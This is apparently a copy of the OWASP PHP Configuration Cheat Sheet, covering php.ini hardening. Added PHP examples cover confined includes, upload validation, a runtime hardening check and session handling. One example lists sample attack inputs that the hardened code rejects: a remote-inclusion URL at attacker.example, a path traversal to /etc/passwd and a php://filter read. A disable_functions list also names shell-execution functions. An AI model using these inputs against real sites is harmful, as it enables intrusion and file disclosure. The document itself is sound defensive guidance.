9/23/22, 8:48 AM PHP Configuration - OWASP Cheat Sheet Series
PHP Configuration Cheat Sheet
Introduction
This page is meant to help those configuring PHP and the web server it is running on to be very secure.
Below you will find information on the proper settings for the php.ini file and instructions on configuring Apache, Nginx, and Caddy web servers.
For general PHP codebase security please refer to the two following great guides:
* Paragonie's 2018 PHP Security Guide
* Awesome PHP Security
PHP Configuration and Deployment
php.ini
Some of the following settings need to be adapted to your system, in particular session.save_path, session.cookie_path (e.g. /var/www/mysite), and session.cookie_domain (e.g. ExampleSite.com).
You should also be running PHP 7.2 or later. If running PHP 7.0 or 7.1, you will use slightly different values in a couple of places below (see inline comments). Finally, look through the PHP Manual for a complete reference on every value in the php.ini configuration file.
You can find a copy of the following values in a ready-to-go php.ini file here.
PHP error handling
    expose_php              = Off
    error_reporting         = E_ALL
    display_errors          = Off
    display_startup_errors  = Off
    log_errors              = On
    error_log               = /valid_path/PHP-logs/php_error.log
    ignore_repeated_errors  = Off
Keep in mind that you need to have display_errors set to Off on a production server (error messages leak paths, queries and stack traces to the client), and it's a good idea to review the error log frequently.
PHP general settings
    doc_root                = /path/DocumentRoot/PHP-scripts/
    open_basedir            = /path/DocumentRoot/PHP-scripts/
    include_path            = /path/PHP-pear/
    extension_dir           = /path/PHP-extensions/
    mime_magic.magicfile    = /path/PHP-magic.mime
    allow_url_fopen         = Off
    allow_url_include       = Off
    variables_order         = "GPCS"
    allow_webdav_methods    = Off
    session.gc_maxlifetime  = 600
Setting allow_url_* to Off prevents local file inclusion (LFI) bugs from being easily escalated to remote file inclusion (RFI): include/require can no longer pull code over http:// or ftp://. It does not fix the LFI itself, so the include path still has to be validated in the application.
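The following is an added example, not code from the OWASP cheat sheet, showing the difference between an include that relies only on allow_url_include = Off and one that also confines the path. The pages directory, the allowlist of page names and the sample inputs are constructed for the demonstration; it runs from the CLI and creates a temporary directory (so mkdir/rmdir must be callable there, even though they are in the disable_functions list recommended for the web SAPI).

```php
<?php
// Added example: LFI vs RFI and a confined include.
declare(strict_types=1);

// VULNERABLE pattern: the page name comes straight from the request.
// With allow_url_include = On, ?page=http://attacker.example/shell.txt is
// remote code execution (RFI). With allow_url_include = Off the http://
// wrapper is refused, but ?page=../../../../etc/passwd, a log file, or a
// php://filter URL still reads or executes local files (LFI).
function vulnerableInclude(string $page): void
{
    include '/path/DocumentRoot/PHP-scripts/pages/' . $page;
}

// HARDENED: closed list of names, strict shape, and a realpath() boundary
// check so symlinks or ".." cannot escape $baseDir (assumed: the pages dir).
function resolvePage(string $baseDir, string $page): ?string
{
    // Only simple names: no slashes, dots, NUL bytes or stream wrappers.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $page)) {
        return null;
    }
    $allowed = ['home', 'about', 'contact'];   // constructed allowlist
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    $real = realpath($baseDir . '/' . $page . '.php');
    $base = realpath($baseDir);
    // realpath() is false for a missing file; also reject anything that
    // canonicalises outside $baseDir.
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function safeInclude(string $baseDir, string $page): void
{
    $file = resolvePage($baseDir, $page);
    if ($file === null) {
        http_response_code(404);
        return;
    }
    include $file;
}

// Belt and braces: refuse to run at all if the ini is weak.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    throw new RuntimeException('allow_url_include must be Off in production');
}

// Demonstration against constructed inputs in a throwaway pages directory.
$pagesDir = sys_get_temp_dir() . '/pages_' . bin2hex(random_bytes(4));
mkdir($pagesDir, 0700);
file_put_contents($pagesDir . '/home.php', "<?php echo \"home page\\n\";");

$inputs = [
    'home',                                                // allowed, exists
    'about',                                               // allowed, but no file
    '../../../../etc/passwd',                              // path traversal
    'http://attacker.example/shell.txt',                   // RFI attempt
    "home\0.jpg",                                          // NUL-byte trick
    'php://filter/convert.base64-encode/resource=index',   // wrapper read
];
foreach ($inputs as $in) {
    $resolved = resolvePage($pagesDir, $in);
    printf("%-55s -> %s\n", json_encode($in),
        $resolved === null ? 'rejected' : 'include ' . basename($resolved));
}
unlink($pagesDir . '/home.php');
rmdir($pagesDir);
```

Only the first input resolves; everything else is rejected before any filesystem access except the realpath() call, which is what open_basedir also constrains. The point is that allow_url_include = Off removes the RFI escalation, while the allowlist and boundary check remove the LFI.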
PHP file upload handling
    file_uploads        = On
    upload_tmp_dir      = /path/PHP-uploads/
    upload_max_filesize = 2M
    max_file_uploads    = 2
If your application is not using file uploads, and say the only data the user will enter / upload is forms that do not require any document attachments, file_uploads should be turned Off.
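An added example (not from the cheat sheet) of an upload handler that relies on the limits above but validates on its own as well. The storage directory, the MIME allowlist and the field name are assumptions. Note that move_uploaded_file appears in the disable_functions list recommended further down; an application that accepts uploads has to keep it enabled, in keeping with "disable all that you don't use".

```php
<?php
// Added example: upload handling that matches the php.ini limits.
declare(strict_types=1);

const UPLOAD_DIR   = '/path/PHP-uploads/store/';   // assumed: outside doc_root
const MAX_BYTES    = 2 * 1024 * 1024;              // mirrors upload_max_filesize = 2M
const ALLOWED_MIME = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'application/pdf' => 'pdf'];

/** Convert php.ini shorthand such as "2M" or "512K" to bytes. */
function iniBytes(string $v): int
{
    $v = trim($v);
    $n = (int) $v;
    switch (strtoupper(substr($v, -1))) {
        case 'G': return $n * 1024 ** 3;
        case 'M': return $n * 1024 ** 2;
        case 'K': return $n * 1024;
        default:  return $n;
    }
}

/**
 * True if the request body exceeded post_max_size. PHP then hands the script
 * EMPTY $_POST and $_FILES with no error code, so this has to be checked
 * from Content-Length rather than from the upload array.
 */
function postTooLarge(): bool
{
    $len = (int) ($_SERVER['CONTENT_LENGTH'] ?? 0);
    return $len > 0 && $len > iniBytes((string) ini_get('post_max_size'));
}

/** Validate one $_FILES entry (single, non-multiple field) and return the stored path. */
function storeUpload(array $file, string $dir = UPLOAD_DIR): string
{
    // Oversize files (upload_max_filesize) arrive as an error code, not as a
    // truncated file; UPLOAD_ERR_INI_SIZE is the one to expect here.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . (int) $file['error']);
    }
    // is_uploaded_file() proves tmp_name was created by this request's upload,
    // so the script cannot be tricked into moving an arbitrary server file.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('tmp_name is not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES || filesize($file['tmp_name']) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Sniff the content; never trust $file['type'] or the client's extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_MIME[$mime])) {
        throw new RuntimeException('disallowed content type ' . $mime);
    }
    // Server-chosen name and extension: no user-controlled path component at all.
    $dest = rtrim($dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . ALLOWED_MIME[$mime];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    return $dest;
}

// Usage in a request handler for a form field named "document":
if (PHP_SAPI !== 'cli') {
    if (postTooLarge()) {
        http_response_code(413);
        exit;
    }
    try {
        $stored = storeUpload($_FILES['document'] ?? []);
    } catch (RuntimeException $e) {
        error_log('upload rejected: ' . $e->getMessage());   // log, never echo
        http_response_code(400);
    }
}
```

Keeping the store outside doc_root (and under open_basedir) means a file that slips through is at worst data, never an executable script reachable by URL.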
PHP executable handling
    enable_dl         = Off
    disable_functions = system, exec, shell_exec, passthru, phpinfo, show_source,
                        popen, proc_open,
                        fopen_with_path, dbmopen, dbase_open, putenv, move_uploaded_file,
                        chdir, mkdir, rmdir, chmod, rename,
                        filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo
    # see also: http://ir.php.net/features.safe-mode
    disable_classes   =
These are dangerous PHP functions. You should disable all that you don't use.
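As an added example (not part of the cheat sheet), here is a boot-time self-check that verifies the running PHP process actually has the error-handling, general-settings and executable-handling values above. It is meant to be required from the front controller, or run as `php -f` against the same php.ini, and to fail closed. The set of directives checked and the exit behaviour are the author's assumptions; adjust file_uploads to false if the application has no uploads.

```php
<?php
// Added example: verify the hardening directives at runtime.
declare(strict_types=1);

/** ini_get() returns raw strings ("1", "", "0", "On"...); normalise to bool. */
function iniBool(string $key): bool
{
    return filter_var(ini_get($key), FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE) ?? false;
}

/** Returns human-readable findings; an empty array means every check passed. */
function hardeningFindings(): array
{
    $findings = [];

    // Booleans from the error-handling and general-settings blocks.
    $expected = [
        'expose_php'             => false,
        'display_errors'         => false,
        'display_startup_errors' => false,
        'log_errors'             => true,
        'allow_url_fopen'        => false,
        'allow_url_include'      => false,
        'enable_dl'              => false,
        'file_uploads'           => true,   // false if the app takes no uploads
    ];
    foreach ($expected as $key => $want) {
        if (iniBool($key) !== $want) {
            $findings[] = sprintf('%s is %s, expected %s',
                $key, var_export(ini_get($key), true), $want ? 'On' : 'Off');
        }
    }

    // error_reporting() returns the effective integer level.
    if (error_reporting() !== E_ALL) {
        $findings[] = 'error_reporting is not E_ALL';
    }
    $log = ini_get('error_log');
    if ($log === false || $log === '') {
        $findings[] = 'error_log is unset (errors go to the SAPI default)';
    }
    if ((string) ini_get('open_basedir') === '') {
        $findings[] = 'open_basedir is unset';
    }

    // disable_functions cannot be changed at runtime, and function_exists()
    // reports a disabled function as absent, so it is the ground truth.
    $mustBeDisabled = ['system', 'exec', 'shell_exec', 'passthru', 'popen',
                       'proc_open', 'phpinfo', 'show_source', 'putenv'];
    foreach ($mustBeDisabled as $fn) {
        if (function_exists($fn)) {
            $findings[] = "$fn is callable; add it to disable_functions";
        }
    }
    return $findings;
}

$findings = hardeningFindings();
if ($findings !== []) {
    // Log the details, but never echo them to a browser: that is its own leak.
    error_log("PHP hardening check failed:\n - " . implode("\n - ", $findings));
    if (PHP_SAPI === 'cli') {
        fwrite(STDERR, implode(PHP_EOL, $findings) . PHP_EOL);
        exit(1);
    }
    http_response_code(503);
    exit;
}
```

Because function_exists() is consulted rather than the disable_functions string, the check also catches the case where a per-directory or per-vhost override re-enabled something the global php.ini had turned off.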
PHP session handling
Session settings are some of the MOST important values to concentrate on in configuring. It is good practice to change session.name to something new.
    session.save_path                = /path/PHP-session/
    session.name                     = myPHPSESSID
    session.auto_start               = Off
    session.use_trans_sid            = 0
    session.cookie_domain            = full.qualified.domain.name
    session.cookie_path              = /application/path/
    session.use_strict_mode          = 1
    session.use_cookies              = 1
    session.use_only_cookies         = 1
    session.cookie_lifetime          = 14400 # 4 hours
    session.cookie_secure            = 1
    session.cookie_httponly          = 1
    session.cookie_samesite          = Strict # PHP 7.3+
    session.cache_expire             = 30
    session.sid_length               = 256
    session.sid_bits_per_character   = 6 # PHP 7.2+
    session.hash_function            = 1 # PHP 7.0-7.1
    session.hash_bits_per_character  = 6 # PHP 7.0-7.1
Some more security paranoid checks
    session.referer_check = /application/path
    memory_limit          = 50M
    post_max_size         = 20M
    max_execution_time    = 60
    report_memleaks       = On
    track_errors          = Off # deprecated in PHP 7.2, removed in PHP 8.0
    html_errors           = Off
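The session directives above are only half of the picture; the application still has to regenerate the ID on login, enforce an idle timeout server-side and expire the cookie on logout. The following is an added example, not code from the cheat sheet, of session handling that matches the ini block (values repeated from it; the function names loginUser/logoutUser and the 600-second idle limit, taken from session.gc_maxlifetime above, are assumptions). The array forms of session_set_cookie_params() and setcookie() need PHP 7.3 or later.

```php
<?php
// Added example: application-side session handling matching the ini settings.
declare(strict_types=1);

/** Fail fast if the session directives the cheat sheet sets are not in effect. */
function assertSessionIni(): void
{
    $want = [
        'session.use_strict_mode'  => true,
        'session.use_only_cookies' => true,
        'session.cookie_secure'    => true,
        'session.cookie_httponly'  => true,
        'session.use_trans_sid'    => false,
        'session.auto_start'       => false,
    ];
    foreach ($want as $key => $expected) {
        $got = filter_var(ini_get($key), FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE) ?? false;
        if ($got !== $expected) {
            throw new RuntimeException("$key is " . var_export(ini_get($key), true)
                . ', expected ' . ($expected ? '1' : '0'));
        }
    }
}

const SESSION_IDLE_SECONDS = 600;   // assumed: same as session.gc_maxlifetime

function startSession(): void
{
    assertSessionIni();
    // Runtime cookie params override php.ini; setting them here means a weaker
    // ini on another host cannot silently downgrade the cookie flags.
    session_set_cookie_params([
        'lifetime' => 14400,                       // 4 hours, as in the ini block
        'path'     => '/application/path/',
        'domain'   => 'full.qualified.domain.name',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_name('myPHPSESSID');
    // With use_strict_mode = 1, an ID the server never issued is discarded and a
    // fresh one generated, which is what defeats fixation via a planted cookie.
    if (!session_start()) {
        throw new RuntimeException('session_start failed');
    }
    // cookie_lifetime is advisory to the browser; the idle timeout is enforced here.
    $now = time();
    if (isset($_SESSION['last_seen']) && $now - $_SESSION['last_seen'] > SESSION_IDLE_SECONDS) {
        session_unset();
        session_regenerate_id(true);   // true: delete the old session data
    }
    $_SESSION['last_seen'] = $now;
}

/** On authentication, change the ID so a pre-login ID cannot be reused. */
function loginUser(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id'] = $userId;
    $_SESSION['auth_at'] = time();
}

function logoutUser(): void
{
    $_SESSION = [];
    // Expire the cookie in the browser as well as destroying server-side state.
    $p = session_get_cookie_params();
    setcookie(session_name(), '', [
        'expires'  => time() - 3600,
        'path'     => $p['path'],
        'domain'   => $p['domain'],
        'secure'   => $p['secure'],
        'httponly' => $p['httponly'],
        'samesite' => $p['samesite'],
    ]);
    session_destroy();
}

// Typical request flow:
// startSession();
// if (credentialsAreValid($user, $pass)) { loginUser($user->id); }
```

session.referer_check is a weak control on its own: PHP only compares the Referer header, which a client may omit, so treat it as a tripwire rather than as CSRF or fixation protection, and rely on use_strict_mode, the cookie flags and the ID regeneration above.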
Suhosin
Suhosin is a patch to PHP which provides a number of hardening and security features that are not available in the default PHP build. However, Suhosin only works with PHP 5, which is unsupported and should not be used.
For PHP 7, there is Suhosin-ng, but it's in a prerelease stage, and as such should not be used in production.
Snuffleupagus
Snuffleupagus is the spiritual descendant of Suhosin for PHP 7 and onwards, with modern features. It's considered stable, and is usable in production.